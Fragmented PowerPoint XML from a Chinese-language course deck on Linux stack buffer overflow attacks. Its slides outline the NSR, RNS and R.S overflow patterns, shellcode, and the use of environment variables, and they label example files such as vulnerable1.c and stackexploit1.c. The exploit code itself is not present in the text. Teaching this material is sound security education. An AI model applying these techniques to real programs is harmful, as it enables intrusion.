                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址填满</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>shellcode+ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281311905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272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272397"/>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272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272405"/>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2404"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="272404"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27240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4" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="2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3F2497A2-C266-4730-91A0-51BBD87D646F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>236</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278530" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统下的栈溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出攻击模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-Shellcode-Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：汇编空操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>R.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621345396"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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47190BEE-584F-42C9-9CFC-656B5B65131E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>237</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273410"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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3416300" y="1965325"/>
            <a:ext cx="215900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3412"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3413"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4"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5"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6" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55911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7" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7931150"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18" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="73501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19" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="677068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20" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="61801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21"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="273422" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2551113" y="2546350"/>
            <a:ext cx="4495800" cy="228600"/>
            <a:chOff x="1296" y="1113"/>
            <a:chExt cx="2832" cy="144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="273423" name="Freeform 15"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="1113"/>
              <a:ext cx="2496"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24" name="Freeform 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3763" y="1113"/>
              <a:ext cx="365"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3427" name="Text Box 19"/>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vulnerable1.c:	                  stackexploit1.c:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273429" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NSR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273430"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50" y="3284538"/>
            <a:ext cx="3527425"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32"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4300" y="3284538"/>
            <a:ext cx="4968875" cy="2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260304"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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AD2549E4-3DC0-4C13-B613-D1CA0245E9D0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274434"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35" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5727700" y="1970088"/>
            <a:ext cx="21590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4436"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4437"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38"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39"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40" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7861300" y="1970088"/>
            <a:ext cx="57785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1" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5149850"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2" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45688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3" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="398938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4" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="34131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5"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="274446" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2584450" y="2546350"/>
            <a:ext cx="2328863" cy="228600"/>
            <a:chOff x="1317" y="1113"/>
            <a:chExt cx="1467" cy="144"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274447" name="Freeform 15"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1626" y="1113"/>
              <a:ext cx="1158"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4448" name="Freeform 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1317" y="1113"/>
              <a:ext cx="323"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4449" name="Text Box 17"/>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 c:	            	        stackexploit2.c:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274453" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="274454"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3284538"/>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56"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638" y="3284538"/>
            <a:ext cx="432117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802950"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6DA83411-6462-4CC6-8C46-CC1E2E3B2216}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>239</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3944938" y="1981200"/>
            <a:ext cx="215900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5459" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482600" y="257651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5460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6107113"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FILE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6688138"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NULL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275462" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="339725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63" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="26050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sp>
        <p:nvSpPr>
          <p:cNvPr id="275464" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="720725" y="2990850"/>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vulnerable2.c:	            	        stackexploit3.c:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275465" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7240588" y="23002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0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275468" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113"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69" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2224088"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70" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="164465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71" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="105410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72" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2454275" y="2543175"/>
            <a:ext cx="1519238" cy="269875"/>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3" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1978025" y="2576513"/>
            <a:ext cx="461963" cy="242887"/>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5" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>R.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出模式－利用环境变量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="275476"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200" y="3357563"/>
            <a:ext cx="4824413"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477"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3357563"/>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523065"/>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a:t>人物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>者身份与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7C3AF6E5-3228-4930-AE8B-0BAFFD905FA5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306773732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-1" y="1371600"/>
          <a:ext cx="9248233" cy="5036344"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s657556" name="Document" r:id="rId4" imgW="5643061" imgH="3073430" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Document" r:id="rId4" imgW="5643061" imgH="3073430" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0"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371600"/>
                        <a:ext cx="9248233" cy="5036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AE62D5EE-40C9-4B7A-BEF9-0F7FDEAD8507}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>240</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
